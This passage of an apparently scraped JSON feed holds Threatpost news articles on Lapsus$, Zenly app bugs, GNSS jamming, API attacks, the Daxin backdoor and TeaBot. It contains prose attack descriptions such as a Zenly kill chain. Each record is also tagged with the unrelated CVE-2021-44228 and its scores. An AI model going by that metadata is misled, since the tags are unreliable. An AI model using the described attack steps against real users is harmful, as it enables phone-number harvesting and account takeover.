Source: Telegram.\n\nBut as GovInfoSecurity [pointed out](<https://www.govinfosecurity.com/despite-arrests-lapsus-adds-globant-to-victim-list-a-18813>), even if Globant\u2019s source code wasn\u2019t directly affected, the source code of the software it provides to its customers may be.\n\n## About Those Admin Credentials\n\nVx-underground \u2013 an internet collection of malware source code, samples and papers \u2013 cited security researcher Dominic Alvieri in tweeting that Lapsus$ threw Globant\u2019s sysadmins \u201cunder the bus\u201d by exposing their passwords to Confluence and other DevOps platforms.\n\nThat shouldn\u2019t come as a surprise: It\u2019s not like the data extortion group has a collection of kid gloves. It has, rather, slapped around the likes of [Brazil\u2019s Ministry of Health](<https://www.zdnet.com/article/brazilian-ministry-of-health-suffers-cyberattack-and-covid-19-vaccination-data-vanishes/>), the gaming giant [Ubisoft](<https://www.toolbox.com/it-security/security-general/news/lapsus-ubisoft-security-incident/>), [Portuguese media kingpin](<https://threatpost.com/portuguese-media-giant-impresa-ransomware/177323/>) Impresa, and, in recent weeks, eviscerated tech giants including [Samsung](<https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/>), [Nvidia](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), [Microsoft](<https://threatpost.com/microsoft-lapsus-compromised-one-employees-account/179048/>) and [Okta](<https://threatpost.com/lapsus-data-kidnappers-claim-snatches-from-microsoft-okta/179041/>).\n\nVx-underground censored those admin passwords, but its whiteout treatment can\u2019t hide the fact that the passwords were pretty stubby and, hence, [pretty guessable](<https://threatpost.com/euros-football-fever-dumb-passwords/166974/>), as well as being [reused](<https://threatpost.com/threatlist-people-know-reusing-passwords-is-dumb-but-still-do-it/155996/>). 
\u201cWe have censored the passwords they displayed. However, it should be noted these passwords are very easily guessable and used multiple times,\u201d the collection noted.\n\n> LAPSUS$ also threw their System Admins under the bus exposing their passwords to confluence (among other things). We have censored the passwords they displayed. However, it should be noted these passwords are very easily guessable and used multiple times\u2026 [pic.twitter.com/gT7skg9mDw](<https://t.co/gT7skg9mDw>)\n> \n> \u2014 vx-underground (@vxunderground) [March 30, 2022](<https://twitter.com/vxunderground/status/1509015154930896899?ref_src=twsrc%5Etfw>)\n\nIn fact, after reviewing the admin passwords, GovInfoSecurity found that a similar-looking password was reused for the Confluence and Jira platforms, while the one used for GitHub \u201cappears similar to ones on the list of[ 200 most commonly used passwords](<https://nordpass.com/most-common-passwords-list/>).\u201d\n\n## So Much for the Arrests\n\nLapsus$\u2019s \u201cvacation\u201d may have been in Tahiti, for all we know, or it may have been time spent reshuffling. At any rate, last week, the City of London Police [arrested](<https://threatpost.com/uk-cops-collar-7-suspected-lapsus-gang-members/179098/>) seven people suspected of being connected to the gang.\n\nThe bust came within hours of Bloomberg having published a [report](<https://www.bloomberg.com/news/articles/2022-03-23/teen-suspected-by-cyber-researchers-of-being-lapsus-mastermind?sref=ylv224K8>) about a teenage boy living at his mother\u2019s house near Oxford, England who\u2019s suspected of being the Lapsus$ mastermind. 
The police didn\u2019t verify whether or not they nabbed the Oxford teen, per se, but given that he\u2019s a minor, they legally couldn\u2019t divulge that detail anyway.\n\nAll of the suspects arrested by London police were released, but the law isn\u2019t going to let up.\n\nAs of a week ago, March 21, the FBI had slapped Lapsus$ onto its [Most Wanted](<https://www.fbi.gov/wanted/seeking-info/lapsus>) list.\n\n\u201cOn March 21, 2022, individuals from a group identifying themselves as Lapsus$ posted on a social media platform and alleged to have stolen source code from a number of United States-based technology companies,\u201d the FBI said. \u201cThese unidentified individuals took credit for both the theft and dissemination of proprietary data that they claim to have illegally obtained. The FBI is seeking information regarding the identities of the individuals responsible for these cyber intrusions.\u201d\n\nKen Westin, director, security strategy at Cybereason, told Threatpost on Wednesday that Lapsus$\u2019s quick resurface after its short hiatus isn\u2019t surprising, given the fact that cybercriminal networks are often spread around the world.\n\n\u201cCybercrime groups, like hacktivist groups, often work in a decentralized fashion, with many members not even knowing each other\u2019s true identities,\u201d he said via email. \u201cThe fact this group is made up of members in many different countries presents challenges for law enforcement as they will need to collaborate with different countries with varying levels of capabilities to go after the perpetrators.\u201d\n\nWestin noted that the Globant breach \u201cseems a bit different on the surface,\u201d given that the resources that were allegedly compromised were around Globant\u2019s DevOps processes. It raises the question of where the initial compromise was and what Lapsus$ did with the access. 
Wha\u201dt is also concerning regarding this compromise is that potential source code for some of their customers appears to have been exposed and Lapsus$ is going after organizations via Globant\u2019s technology and now services partners,\u201d he added.\n\n033022 12:40 UPDATE: Added input from Ken Westin.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T16:29:10", "type": "threatpost", "title": "Lapsus$ \u2018Back from Vacation\u2019", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T16:29:10", "id": "THREATPOST:38E044431D55F0A4BC458FF92EB025BF", "href": 
"https://threatpost.com/lapsus-back-from-vacation/179156/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-24T20:38:32", "description": "Zenly, a social app from Snap that allows users to see the locations of friends and family on a live map, contains a pair of vulnerabilities that could endanger those being tracked.\n\nAccording to the Checkmarx Security Research Team, the bugs are a user-data exposure vulnerability and an account-takeover vulnerability. Both have been patched, and users should upgrade their apps to the latest version to avoid compromise.\n\n## **Phone-Number Reveal**\n\nThe first bug is a medium-severity problem that reveals the phone numbers of users.\n\n\u201cWhen submitting a friend request to a user, Zenly will allow access to their phone number regardless of whether the friend request is accepted or not,\u201d explained the researchers, in a [Thursday posting](<https://checkmarx.com/blog/zenly-fixes-user-data-exposure-and-account-takeover-risks/>). 
\u201cTo obtain this information, a malicious actor only needs to know their username.\u201d\n\nObtaining usernames is easier than it might be, they added, since Zenly exposes an \u201cexhaustive list of friends of a user.\u201d\n\nAs for how an attack might play out in practice, Checkmarx offered a hypothetical of a cyberattacker targeting a CEO.\n\nSteps in the kill chain would include the following, researchers said:\n\n * Search the web for an employee of the company and try to obtain their social-media handle (for example, on Twitter);\n * Employees who work on communications or marketing fields are typically more exposed and represent easier targets;\n * Check if their handle is valid on Zenly;\n * Access their list of friends through Zenly, obtain the handle of the CEO;\n * Retrieve the phone number of the CEO through their username by exploiting the vulnerability;\n * Carry out a spear-phishing attack, using the phone number of the CEO;\n * And, an attacker can also repeat these steps to obtain the phone number of other employees and thus prepare a more credible attack.\n\n### **Anatomy of an Exploit**\n\nThe vulnerability makes use of the \u201cAdd by Username\u201d flow, which starts by searching a known username, according to Checkmarx.\n\nThen, \u201can environment that enables intercepting and decoding network requests\u2026to gain visibility over network activity\u201d can be used to view requests that occur during the username search.\n\n\u201cBy observing the response of the request that was executed on the /UserPublicFriends endpoint, a list of friends can be seen, although it is not displayed on the user interface of the application,\u201d according to the analysis. \u201cThis list contains every friend of the user, one of them is Bogus_CEO (bogus CEO of Zenly, for demonstration purposes). 
Note that the response also contains their username, which could in turn be used to repeat this process and obtain their friends list instead.\u201d\n\nOnce the target username has been identified, the same interceptor can get used to obtain the associated phone number via a view called \u201cAdd by Username\u201d view, then tapping the \u201cAdd as Friend\u201d button, according to researchers.\n\n\u201cThis friend invitation will trigger a request to the /FriendRequestCreate endpoint, whose response contains specific information regarding both our user and the target user,\u201d they added. \u201cNote that the response contains both our phone number and the phone number of the target user, even though our friend request was never accepted by the target user.\u201d\n\n## **Account Takeover Issue**\n\nThe second vulnerability is also rated as medium-severity. A successful exploit would allow an attacker to access a user\u2019s location, notifications, conversations and friends\u2019 information just like the legitimate user could.\n\nThe bug exists in the user-authentication flow, according to Checkmarx, That authentication uses SMS messages containing verification codes to validate sessions.\n\nAfter the SMS message is sent to the user, the app calls the /SessionVerify endpoint with both the session token and the verification code received by SMS.\n\nAn attacker can abuse the /SessionCreate endpoint to steal session tokens, the researchers explained: \u201cOnce the legitimate user validates the SMS code for that session token, the session will become valid for both the legitimate user and the attacker\u2026This means that the attacker now has a valid session for the account of the legitimate user, even though the attacker never knew the verification code.\u201d\n\nThe reason why the bug is only rated medium is that an exploit is difficult to carry out. Attackers would need to know the mobile phone number of the victim (possible via the first bug). 
They also must know when the victim will login, sign up, register a new device or go through the authentication flow for any other reason.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _****_[FREE downloadable eBook](<https://bit.ly/3Jy6Bfs>)_****_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists. _**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-24T20:07:34", "type": "threatpost", "title": "Zenly Social-Media App Bugs Allow Account Takeover", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-24T20:07:34", "id": "THREATPOST:E09CE3FA2B76F03886BA3C2D4DB4D8DB", "href": "https://threatpost.com/zenly-bugs-account-takeover/178646/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-18T20:14:45", "description": "In a warning to aviation 
authorities and air operators on Thursday, the European Union Aviation Safety Agency (EASA) warned of satellite jamming and spoofing attacks across a broad swath of Eastern Europe that could affect air navigation systems.\n\nThe warning came in tandem with a separate alert from the FBI and the U.S. Cybersecurity Infrastructure and Security Agency (CISA) that hackers could be targeting satellite communications networks in general.\n\n## **Quit Jammin\u2019 Me**\n\nThe navigation-jamming attacks affecting airplanes started Feb. 24, the first day of the Russian invasion of Ukraine, EASA said \u2013 and they\u2019ve continued to proliferate. So far, the affected areas include the Black Sea airspace, Eastern Finland, the Kaliningrad region and other Baltic areas, and the Eastern Mediterranean area near Cyprus, Turkey, Lebanon, Syria and Israel, as well as Northern Iraq.\n\n\u201cThe effects of [Global Navigation Satellite Systems (GNSS)] jamming and/or possible spoofing were observed by aircraft in various phases of their flights, in certain cases leading to re-routing or even to change the destination due to the inability to perform a safe landing procedure,\u201d EASA warned (PDF). \u201cUnder the present conditions, it is not possible to predict GNSS outages and their effects.\u201d\n\nLosing a GNSS signal could result in many negative outcomes, including pilots \u201cflying blind,\u201d without the use of waypoint navigation to tell where they are. 
Outages could also affect the ability for an airplane\u2019s instrumentation to accurately track the aircraft\u2019s position, which could lead to a plane entering contested airspace; the inability to properly gauge one\u2019s proximity to the ground (which could trigger pull-up commands, according to the alert); or the failure of systems that address dangers like wind shear.\n\n\u201cThe magnitude of the issues generated by such outage would depend upon the extent of the area concerned, on the duration and on the phase of flight of the affected aircraft,\u201d EASA warned.\n\nThe agency urged air operators to make sure that fall-back conventional navigation infrastructure is fully operational onboard the aircraft, and to ensure reliable surveillance coverage that is resilient to GNSS interference, such as ground-based navigational aids (i.e., Distance Measuring Equipment or DME, and Very High Frequency omnidirectional range or VOR).\n\n\u201cVerify the aircraft position by means of conventional navigation aids when flights are operated in proximity of the affected areas; check that the navigation aids critical to the operation for the intended route and approach are available; and remain prepared to revert to a conventional arrival procedure where appropriate and inform air traffic controllers in such a case,\u201d EASA recommended. \u201cEnsure, in the flight planning and execution phase, the availability of alternative conventional arrival and approach procedures (i.e. an aerodrome in the affected area with only GNSS approach procedure should not be considered as destination or alternate).\u201d\n\n## **CISA Warns on Satellite Network Hacking**\n\nThe concerns over the hacking of satellite systems in general also began Feb. 24, when Ukrainian official reported that hackers had apparently compromised one of the nation\u2019s satellite systems. 
According [to Reuters](<https://www.reuters.com/world/europe/exclusive-us-spy-agency-probes-sabotage-satellite-internet-during-russian-2022-03-11/>), the attack made communication with the Viasat KA-SAT satellite impossible, which resulted in internet outages across Europe, with tens of thousands of people cut off.\n\nThe cyberattackers took advantage of a misconfigured management interface for the satellite network, Viasat said.\n\nThe National Security Agency is looking into whether the attack was carried out by Russian state-sponsored actors, according to the report.\n\nThis week, CISA [tersely warned](<https://www.cisa.gov/uscert/ncas/alerts/aa22-076a>) that it is \u201caware of possible threats to U.S. and international satellite communication (SATCOM) networks. Successful intrusions into SATCOM networks could create risk in SATCOM network providers\u2019 customer environments.\u201d\n\nThe agency advised satellite operators to start monitoring at ingress and egress points for anomalous traffic, including the use of various remote access tools (Telnet, FTP, SSH and so on); connections out to \u201cunexpected\u201d network segments; unauthorized use of local or backup accounts; unexpected traffic to terminals or closed-group SATCOM networks; and brute-force login attempts.\n\nSatellite customers meanwhile should implement multifactor authentication (MFA) on their accounts, CISA warned, and should shore up least-privilege approaches for any sensitive areas served by satellite links.\n\nAndreas Galauner, lead security researcher at Rapid7, noted that in the U.S., critical infrastructure is likely the target for such attacks.\n\n\u201cAlmost no private individual uses SATCOM, as it is costly and the latency is too high and slow,\u201d he said via email. 
\u201cThis leaves industrial and critical infrastructures, which makes SATCOM an appealing target.\u201d\n\nJames McQuiggan, security awareness advocate at KnowBe4, made a similar assessment.\n\n\u201cCommunication is a critical element needed in life these days, whether between families or between governments,\u201d he emailed. \u201cIf the ability to communicate is lost, it becomes challenging to strategize, coordinate or plan. When cybercriminals are targeting this element of critical infrastructure, cyber-resiliency is essential to remain in contact. Organizations working with SATCOM products or services need to ensure protections to secure access to the devices with multi-factor authentication. Ensure all systems are up to date with software and firmware updates, increase monitoring of traffic and logs, and review incident response plans to prepare for an outage.\u201d\n\nISPs of all stripes should be vigilant, Galauner added.\n\n\u201cEven though this particular risk relates to satellite communication networks, this has happened before in \u2018normal\u2019 ISPs,\u201d he said. \u201cIn those instances, what got \u2018pwned\u2019 is the CPE: modems and routers that weren\u2019t configured properly by the ISP. This could happen on DSL and cable lines as much as it can happen here. However, a satellite network, possibly spanning huge geographical areas, might allow attackers to perform more widespread attacks without having to be in the physical vicinity.\u201d\n\n_**Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-18T20:05:36", "type": "threatpost", "title": "Agencies Warn on Satellite Hacks & GPS Jamming Affecting Airplanes, Critical Infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-18T20:05:36", "id": "THREATPOST:075BA69792AA7B1AE4C28E1CBE61E360", "href": "https://threatpost.com/agencies-satellite-hacks-gps-jamming-airplanes-critical-infrastructure/178993/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T14:53:41", "description": "In late July 2021, online retailers got hit with a jaw-dropping 2,800 percent increase in attack takeovers. 
Dead-set on gift card fraud via \u201cscrape for resale\u201d and other types of fraud, the attacks spiraled up to the rate of 700,000 attacks per day.\n\nIn a separate case \u2013 of a loan application fraud attack \u2013 the threat actors used the sub-accounts feature on public email domains such as Gmail to create 3,000 email addresses, which were then used to submit roughly 45,000 fraudulent loan applications distributed across multiple IP addresses.\n\nBoth are examples of [API attacks](<https://www.reblaze.com/wiki/api-security/what-is-an-api-attack/>): attacks that prey on application programming interfaces (APIs), which \u201chave become the glue that holds today\u2019s apps together,\u201d as Cequence Security Hacker-in-Residence Jason Kent explained for Threatpost in his August 2021 InfoSec Insider [article](<https://threatpost.com/top-3-api-vulnerabilities-cyberattackers/169048/>) on the top 3 API security vulnerabilities and how cyberattackers use them to pwn apps.\n\n\u201cThere\u2019s an API to turn on the kitchen lights while still in bed. There\u2019s an API to change the song playing on your house speakers. Whether the app is on your mobile device, entertainment system or garage door, APIs are what developers use to make applications function,\u201d Kent wrote.\n\n## How API Glue Sticks\n\nKent explained that APIs are attractive to both developers and attackers because they can operate much like a URL might operate: \u201cTyping \u2018www.example[.]com\u2019 into a web browser will elicit a response from example.com. Search for your favorite song and you will see the following in the URL bar: \u2018www.example.com/search?{myfavoritesong}\u2019,\u201d he wrote. \u201cThe page result is dynamically built to present you with your search findings.\n\n\u201cYour mobile banking app operates in the same manner, with the API grabbing your name, account number and account balance \u2013 and populating the fields in the pre-built pages accordingly. 
While APIs have similar characteristics to web applications, they are far more susceptible to attacks; they include the entire transaction, including any security checks, and are typically communicating directly to a back-end service.\u201d\n\nThese issues aren\u2019t new, he said: \u201cIn the late 1990s folks figured out that you could often drop a single quote (\u2018) into a search box or login field and the application would respond with a database error. Understanding SQL database syntax means that a vulnerable application was simply a wide-open application that one could potentially have total control over. And once found, SQL vulnerabilities were often attacked.\u201d\n\nHistory keeps repeating itself, but threat actors\u2019 abuse of APIs keeps evolving. Cequence \u2013 which markets its API Security Platform \u2013 accordingly keeps tabs on trends in API abuse.\n\n## API Security Threat Report\n\nLast week, Cequence released its \u201cAPI Security Threat Report: Bots and Automated Attacks Explode,\u201d revealing that both developers and attackers are head over heels in love with APIs, for better or worse. Of the 21.1 billion transactions analyzed by Cequence Security in the last half of 2021, 14 billion (70 percent) were API transactions, the firm said in a [press release](<https://www.cequence.ai/news/cequence-security-releases-report-revealing-top-3-attack-trends-in-api-security/>) announcing the report ([PDF](<https://www.cequence.ai/wp-content/uploads/2022/03/Cequence-Threat-API-Security.pdf>)).\n\nKent dropped in on the Threatpost podcast last week to talk about the following three attack trends that Cequence highlighted in its recent report:\n\n * **Gift card fraud, loan fraud and payment fraud,** such as the two attacks described above.\n * **More sophisticated shopping bots,** with bots-as-a-service (BaaS) allowing anyone to buy, rent and subscribe to a network of malicious bots and use it to acquire high-demand items. 
Bots drove traffic to between 36M (1,200 percent) and 129M (4,300 percent) above normal, with up to 86 percent of the transactions being malicious.\n * **The account takeover cat-and-mouse game.** \u201cAttack patterns went from massive in nature, with malicious ATOs making up 80% of the login traffic, to the polar opposite pattern of low, slow and perfectly formed transactions,\u201d according to Cequence.\n\n## Fending Off API Attacks\n\nIn our interview, Jason also offered advice for organizations on detecting these API attacks, with an emphasis on machine-learning models.\n\nBut the most important element of defense is discovery, he stressed: \u201cYou have to know what you have. It\u2019s the foundation and the basis of every security paradigm and program,\u201d he said. \u201cKnowing which APIs you have, we\u2019re finding, is paramount for organizations.\n\n\u201cWe see things like, they\u2019ll move to Version 16 of their API. So their calls are slash new 16 slash login. But is 15 still on? Is 14 still on? Why am I still seeing traffic on one? Having that inventory of what\u2019s functioning and what\u2019s going on right now is becoming one of those things where organizations are seeing so much,\u201d he said.\n\nSeeing is believing. If your organization heeds his advice and delves into discovery, expect to see just how much attention threat actors are lavishing on APIs.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/031722_Cequence_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\nAs well, here\u2019s a link to an article by Jason that he discusses in the podcast, entitled [Gmail Farming and Credential Validation](<https://www.cequence.ai/blog/gmail-farming-and-credential-validation/>).\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T13:00:59", "type": "threatpost", "title": "Top 3 Attack Trends in API Security \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T13:00:59", "id": "THREATPOST:2188E3E33D86C2C3DF35253A3ED7FA6C", "href": "https://threatpost.com/top-3-attack-trends-in-api-security-podcast/179064/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-01T18:09:38", "description": "The Daxin malware is taking aim at hardened government networks around the world, according to researchers, with the goal of cyberespionage.\n\nThe Symantec Threat Hunter team noticed 
the advanced persistent threat (APT) weapon in action in November, noting that it\u2019s \u201cthe most advanced piece of malware Symantec researchers have seen from [China-linked actors](<https://threatpost.com/victory-backdoor-apt-campaign/166700/>)\u2026exhibiting technical complexity previously unseen by such actors.\u201d\n\nThey added that Daxin\u2019s specific scope of operations includes reading and writing arbitrary files; starting and interacting with arbitrary processes; and advanced lateral movement and stealth capabilities.\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) also flagged the activity, which Symantec characterized as \u201clong-running.\u201d The earliest known sample of the malware dates from 2013, when it already had a large part of the codebase fully developed.\n\n\u201cDaxin malware is a highly sophisticated rootkit backdoor with complex, stealthy command-and-control (C2) functionality that enabled remote actors to communicate with secured devices not connected directly to the internet,\u201d warned CISA, in a [Monday alert](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/28/broadcom-software-discloses-apt-actors-deploying-daxin-malware>). \u201cDaxin appears to be optimized for use against hardened targets, allowing the actors to deeply burrow into targeted networks and exfiltrate data without raising suspicions.\u201d\n\n## **Built for Stealth**\n\nFrom a technical standpoint, Daxin takes the form of a Windows kernel driver, according to Symantec\u2019s [Monday analysis](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/daxin-backdoor-espionage>), and has a focus on stealth.\n\n\u201cDaxin\u2019s capabilities suggest the attackers invested significant effort into developing communication techniques that can blend in unseen with normal network traffic on the target\u2019s network,\u201d the firm found. \u201cSpecifically, the malware avoids starting its own network services. 
Instead, it can abuse any legitimate services already running on the infected computers.\u201d\n\nIt communicates with legitimate services via network tunneling, the researchers added, and it can set up daisy-chain communications to move internally via hops between several linked computers.\n\n\u201cDaxin is also capable of relaying its communications across a network of infected computers within the attacked organization,\u201d they said. \u201cThe attackers can select an arbitrary path across infected computers and send a single command that instructs these computers to establish requested connectivity. This use case has been optimized by Daxin\u2019s designers.\u201d\n\nDaxin also can hijack legitimate TCP/IP connections. According to Symantec, it monitors all incoming TCP traffic for certain patterns, and when a preferred pattern is detected, it disconnects the legitimate recipient and takes over the connection.\n\n\u201cIt then performs a custom key exchange with the remote peer, where two sides follow complementary steps. The malware can be both the initiator and the target of a key exchange,\u201d according to the analysis. \u201cA successful key exchange opens an encrypted communication channel for receiving commands and sending responses. Daxin\u2019s use of hijacked TCP connections affords a high degree of stealth to its communications and helps to establish connectivity on networks with strict firewall rules. It may also lower the risk of discovery by SOC analysts monitoring for network anomalies.\u201d\n\nWhen all of this is put together, the result is a single command message that includes all the details required to establish communication, specifically the node IP address, its TCP port number and the credentials to use during the custom key exchange. 
When Daxin receives this message, it picks the next node from the list.\n\nThe research team linked Daxin to Chinese actors because it\u2019s usually deployed alongside tools known to be associated with Chinese espionage actors.\n\n\u201cMost of the targets appear to be organizations and governments of strategic interest to China,\u201d they added. \u201cDaxin is without doubt the most advanced piece of malware Symantec researchers have seen used by a China-linked actor.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-01T17:55:46", "type": "threatpost", "title": "Daxin Espionage Backdoor Ups the Ante on Chinese Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-01T17:55:46", "id": "THREATPOST:1CC682A86B6D521AD5E357B9DB3A1DFB", "href": "https://threatpost.com/daxin-espionage-backdoor-chinese-malware/178706/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-02T22:50:57", "description": "The TeaBot banking trojan \u2013 also known as \u201cAnatsa\u201d \u2013 has been spotted on the Google Play store, researchers from Cleafy have [discovered](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>).\n\nThe malware \u2013 designed to intercept SMS messages and login credentials from unwitting users \u2013 affected users of \u201cmore than 400 banking and financial apps, including those from Russia, China, and the U.S,\u201d its report claims.\n\nThis isn\u2019t the first time TeaBot has terrorized Android users.\n\n## TeaBot Just Won\u2019t Die\n\nTeaBot was first [discovered](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) last year. It\u2019s a relatively straightforward malware designed to siphon banking, contact, SMS and other types of private data from infected devices. What makes it unique \u2013 what gives it such staying power \u2013 is the clever means by which it spreads.\n\nTeaBot requires no malicious email or text message, no fraudulent website or third-party service. Instead, it typically comes packaged in a dropper application. Droppers are programs that seem legitimate from the outside, but in fact act as vehicles to deliver a second-stage malicious payload.\n\nTeaBot droppers have masked themselves as ordinary QR code or PDF readers. 
